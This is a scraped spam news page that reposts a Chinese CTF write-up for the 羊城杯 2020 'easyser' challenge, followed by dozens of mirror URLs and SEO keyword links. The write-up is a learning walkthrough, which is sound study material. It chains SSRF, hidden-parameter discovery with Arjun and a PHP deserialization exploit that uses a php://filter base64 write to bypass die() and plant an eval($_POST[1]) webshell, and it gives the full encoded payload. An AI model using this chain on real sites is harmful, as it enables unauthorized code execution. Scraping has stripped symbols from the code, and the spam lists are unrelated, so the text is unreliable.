当前位置: 首页 > news >正文 建设银行征信中心官方网站国内新闻大事20条 news 2025/11/6 8:57:17 建设银行征信中心官方网站,国内新闻大事20条,电子商务网站建设前期,全运会网站的建设NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。 不要慌#xff0c;无从下手时。看源码、扫目录、抓包。一套操作下来#xff0c;发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php#xff0c;一说到百度#xff0c;就猜测是否存在SSRF。 源码中…NSS [羊城杯 2020]easyser 开题。很容易让人觉得环境坏了。 不要慌·无从下手时。看源码、扫目录、抓包。一套操作下来发现几个可以下手的路由。 /index.php /robots.txt 访问 /star1.php一说到百度就猜测是否存在SSRF。 源码中有提示更加确定是SSRF了。 SSRF进内网读取ser.php成功读取。 http://127.0.0.1/ser.php好家伙有源码没有反序列化入口 没关系我们可以用一个工具arjun kali上安装 pip3.8 install arjun使用 arjun -u URL详细使用方法 https://github.com/s0md3v/Arjun/wiki/Usage用 Arjun 来扫描 http参数。 star1.php 页面除了 path 参数还有一个 c 参数。Arjun显示发现c的原理是根据响应的body的长度后续通过分析代码发现不设置参数c会显示your hat is too black!存在参数c就不会显示任何内容所以的确是可以根据响应长度来发现参数。c 就是反序列化的入口。但是不知道他是如何反序列化的。 桌面root终端直接用就行了 arjun -u http://node4.anna.nssctf.cn:28617/star1.php?pathhttp://127.0.0.1/ser.php不知道为什么2.2.1版本的没跑出来用一下别的师傅的图。 即使不知道他是怎么反序列化的我们依然能做。分析源码我们的重点肯定是Yongen::hasaki()在这个方法里面绕过死亡die同时写马到文件。死亡die用rot13或者base64都能绕过。通过base64解密或rot13解密使?php die(nononon);?变为乱码而传入的$text为base64编码解码后为正常shell语句。通过这种方式使前者失效。 链子如下 GWHT::__construct()-GWHT::__toString()-Yongen::hasaki()exp用string.strip_tags 将?php?全部删掉再base64解码 ?phpclass GWHT{public $hero; } class Yongen{ //flag.phppublic $file;public $text; }$anew GWHT; $a-heronew Yongen; $a-hero-filephp://filter/writestring.strip_tags|convert.base64-decode/resource1.php; $a-hero-textPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8;echo urlencode(serialize($a));payload: /star1.php?pathhttp://127.0.0.1/ser.phpcO%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A73%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3D1.php%22%3Bs%3A4%3A%22text%22%3Bs%3A32%3A%22PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%22%3B%7D%7D访问1.phpgetshell。 文章转载自: http://www.morning.jqhrk.cn.gov.cn.jqhrk.cn http://www.morning.sxmbk.cn.gov.cn.sxmbk.cn http://www.morning.bmhc.cn.gov.cn.bmhc.cn http://www.morning.bflwj.cn.gov.cn.bflwj.cn http://www.morning.jfjbl.cn.gov.cn.jfjbl.cn http://www.morning.kjyhh.cn.gov.cn.kjyhh.cn http://www.morning.hbjqn.cn.gov.cn.hbjqn.cn http://www.morning.bxgpy.cn.gov.cn.bxgpy.cn http://www.morning.qkdjq.cn.gov.cn.qkdjq.cn http://www.morning.hmwjk.cn.gov.cn.hmwjk.cn http://www.morning.zwdrz.cn.gov.cn.zwdrz.cn http://www.morning.fyzsq.cn.gov.cn.fyzsq.cn http://www.morning.zrkws.cn.gov.cn.zrkws.cn http://www.morning.jjsxh.cn.gov.cn.jjsxh.cn http://www.morning.xjqkh.cn.gov.cn.xjqkh.cn http://www.morning.jtszm.cn.gov.cn.jtszm.cn http://www.morning.phtqr.cn.gov.cn.phtqr.cn http://www.morning.swwpl.cn.gov.cn.swwpl.cn http://www.morning.nzfjm.cn.gov.cn.nzfjm.cn http://www.morning.lmrcq.cn.gov.cn.lmrcq.cn http://www.morning.bfrff.cn.gov.cn.bfrff.cn http://www.morning.xkyst.cn.gov.cn.xkyst.cn http://www.morning.kqkmx.cn.gov.cn.kqkmx.cn http://www.morning.txgjx.cn.gov.cn.txgjx.cn http://www.morning.tdxlj.cn.gov.cn.tdxlj.cn http://www.morning.yxwrr.cn.gov.cn.yxwrr.cn http://www.morning.muniubangcaishui.cn.gov.cn.muniubangcaishui.cn http://www.morning.bwjgb.cn.gov.cn.bwjgb.cn http://www.morning.nhbhc.cn.gov.cn.nhbhc.cn http://www.morning.xdnhw.cn.gov.cn.xdnhw.cn http://www.morning.ljsxg.cn.gov.cn.ljsxg.cn http://www.morning.kwpnx.cn.gov.cn.kwpnx.cn http://www.morning.lsjtq.cn.gov.cn.lsjtq.cn http://www.morning.ahscrl.com.gov.cn.ahscrl.com http://www.morning.pjzcp.cn.gov.cn.pjzcp.cn http://www.morning.tqdqc.cn.gov.cn.tqdqc.cn http://www.morning.ykrss.cn.gov.cn.ykrss.cn http://www.morning.fkyqm.cn.gov.cn.fkyqm.cn http://www.morning.mfrb.cn.gov.cn.mfrb.cn http://www.morning.lsfbb.cn.gov.cn.lsfbb.cn http://www.morning.nqlx.cn.gov.cn.nqlx.cn http://www.morning.rpjyl.cn.gov.cn.rpjyl.cn http://www.morning.crrjg.cn.gov.cn.crrjg.cn http://www.morning.jppdk.cn.gov.cn.jppdk.cn http://www.morning.qbrdg.cn.gov.cn.qbrdg.cn http://www.morning.yhgbd.cn.gov.cn.yhgbd.cn http://www.morning.nqrlz.cn.gov.cn.nqrlz.cn http://www.morning.ywpwq.cn.gov.cn.ywpwq.cn http://www.morning.sxwfx.cn.gov.cn.sxwfx.cn http://www.morning.qjghx.cn.gov.cn.qjghx.cn http://www.morning.nytpt.cn.gov.cn.nytpt.cn http://www.morning.nlgyq.cn.gov.cn.nlgyq.cn http://www.morning.dnpft.cn.gov.cn.dnpft.cn http://www.morning.drswd.cn.gov.cn.drswd.cn http://www.morning.msgcj.cn.gov.cn.msgcj.cn http://www.morning.qstkk.cn.gov.cn.qstkk.cn http://www.morning.rnzbr.cn.gov.cn.rnzbr.cn http://www.morning.hympq.cn.gov.cn.hympq.cn http://www.morning.rbbzn.cn.gov.cn.rbbzn.cn http://www.morning.ssglh.cn.gov.cn.ssglh.cn http://www.morning.rfldz.cn.gov.cn.rfldz.cn http://www.morning.fbzdn.cn.gov.cn.fbzdn.cn http://www.morning.nsfxt.cn.gov.cn.nsfxt.cn http://www.morning.rfbt.cn.gov.cn.rfbt.cn http://www.morning.guanszz.com.gov.cn.guanszz.com http://www.morning.hwlk.cn.gov.cn.hwlk.cn http://www.morning.nqlcj.cn.gov.cn.nqlcj.cn http://www.morning.dtrcl.cn.gov.cn.dtrcl.cn http://www.morning.xtyyg.cn.gov.cn.xtyyg.cn http://www.morning.flpjy.cn.gov.cn.flpjy.cn http://www.morning.qtnmp.cn.gov.cn.qtnmp.cn http://www.morning.drbd.cn.gov.cn.drbd.cn http://www.morning.vuref.cn.gov.cn.vuref.cn http://www.morning.clccg.cn.gov.cn.clccg.cn http://www.morning.ytmx.cn.gov.cn.ytmx.cn http://www.morning.jxgyg.cn.gov.cn.jxgyg.cn http://www.morning.pjyrl.cn.gov.cn.pjyrl.cn http://www.morning.ylkkh.cn.gov.cn.ylkkh.cn http://www.morning.tnjkg.cn.gov.cn.tnjkg.cn http://www.morning.xskbr.cn.gov.cn.xskbr.cn 查看全文 http://www.tj-hxxt.cn/news/281839.html 相关文章: 广州建网站的公司 白云区对网站开发的理解500字 网站建设优化制作公司个人小程序开发 微信网站背景图片手机网站模板图片 网站开发多少费用自己建网站怎样建 jsp网站开发难点学做川菜下什么网站 网站空间如何续费网站开发 前端如何学习 河南建设厅网站查证绍兴网站制作方案定制 网站制作评价制作图片模板 建设银行广西分行网站合肥刚刚发布紧急通知 做五金有哪些网站推广西双版纳傣族自治州属于哪里 成都 直播网站建设晋江市住房和城乡建设局网站是多少 做很多网站国内最新的新闻 优质的专业网站建设计算机应用技术好就业吗 织梦网站漏洞网站建设的常见问题 中国建筑设计作品网站wordpress点赞功能纯代码 广东建设教育协会网站首页广州做网站哪家强 个人网站备注模板内网做网站 学做淘宝店的网站吗Wordpress的高级版 怎样成立网站郑州网站建设郑州网站建设 织梦关闭网站静态网站跟动态的区别 临沂seo网站推广公司网站换服务器怎么做 济宁做网站有哪几家wordpress商城微信 怎样黑进别人的网站wordpress+任意下载 网站域名名字青海格尔木建设局网站 莒县建设局官方网站和业务多一样的平台 龙华做棋牌网站建设权威的南昌网站建设 吉林省住房和城乡建设部网站外包网站制作 如何查找各种网站wordpress 升级php版本 天津建设网工程信息网企业网站搜索引擎优化方案 深圳网站开发的公司电话网站后台编辑怎么做
